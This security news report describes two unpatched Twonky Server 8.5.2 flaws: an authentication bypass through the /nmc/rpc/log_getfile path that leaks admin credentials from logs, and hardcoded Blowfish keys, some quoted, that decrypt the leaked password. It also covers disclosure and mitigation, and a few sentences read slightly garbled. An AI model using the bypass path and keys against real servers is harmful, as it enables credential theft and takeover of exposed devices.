Twonky Server version 8.5.2 contains two serious flaws that allow attackers to bypass authentication and steal admin credentials on Linux and Windows systems.
These issues, tracked as CVE-2025-13315 and CVE-2025-13316, allow remote attackers to extract encrypted admin passwords from logs and crack them using hard-coded keys built into the software.
No patch exists, as Lynx Technology stopped responding after initial contact and said fixes are impossible.
Twonky Server is media software for NAS devices, routers, and set-top boxes that streams audio, video, and photos via DLNA and UPnP.
It runs on embedded systems without requiring user-customized code. Shodan shows about 850 publicly accessible instances, raising risks to home and business networks.
Rapid7 researcher Ryan Emmons found these flaws, building on 2021 research by Risk Based Security.
Technical Breakdown
CVE-2025-13315 scores 9.3 critical on the CVSS v4.0 scale due to easy network access and a high impact on data and availability.
Past fixes added auth checks to /rpc paths like get_option?accesspwd, but left gaps in routing code. Decompiled binaries show that if (!check_path(&arg1, “/rpc/info_status”)) logic skips some endpoints.
Attackers use /nmc/rpc/log_getfile instead of /rpc/log_getfile to fetch logs without login. These logs hold the admin username and encrypted password from startup.
Retrieves the file over HTTP. This bypasses mitigations from prior flaws, allowing hackers to call shutdown APIs as well.
CVE-2025-13316 rates 8.2 high, as hardcoded Blowfish keys make decryption trivial.
The binary lists 12 static keys, such as “E8ctd4jZwMbaV587” and “jwEkNvuwYCjsDzf5”, at addresses 008c7fe0 onward.
Encryption picks a random index via srand and sub_464c10() % 0xc, formats, formats as ||{HEX_INDEX}{HEX_CIPHERTEXT} in config.
Attackers reverse this with the index from logs. A Metasploit module leaks “14ee76270058c6e3c9f8cecaaebed4fc5206a1d2066d4f78, 7”, decrypts with key 7 to “admin:R7Password123!!!” and logs in.
Tested on Ubuntu 22.04.1 and Windows Server 2022, chaining both gives complete control over media files. Lynx offers standard and premium DTCP-IP versions, but both suffer from the same issue.
| CVE | Description | CVSS |
| CVE-2025-13315 | An unauthenticated remote attacker can bypass web service API authentication controls to leak a log file and read the administrator’s username and encrypted password. | 9.3 (Critical) |
| CVE-2025-13316 | The application uses hardcoded encryption keys across installations. An attacker with an encrypted administrator password value can decrypt it into plain text using these hardcoded keys. | 8.2 (High) |
Disclosure began in August 2025 with vendor contact, but Lynx cited resource constraints and went silent despite timeline extensions. Version 8.5.2 stays the latest.
Users must block untrusted IPs via firewalls and reset all admin passwords in the event of a compromise.
Rapid7 tools like InsightVM detect this now. Switch to patched media servers where possible to avoid ongoing risks.
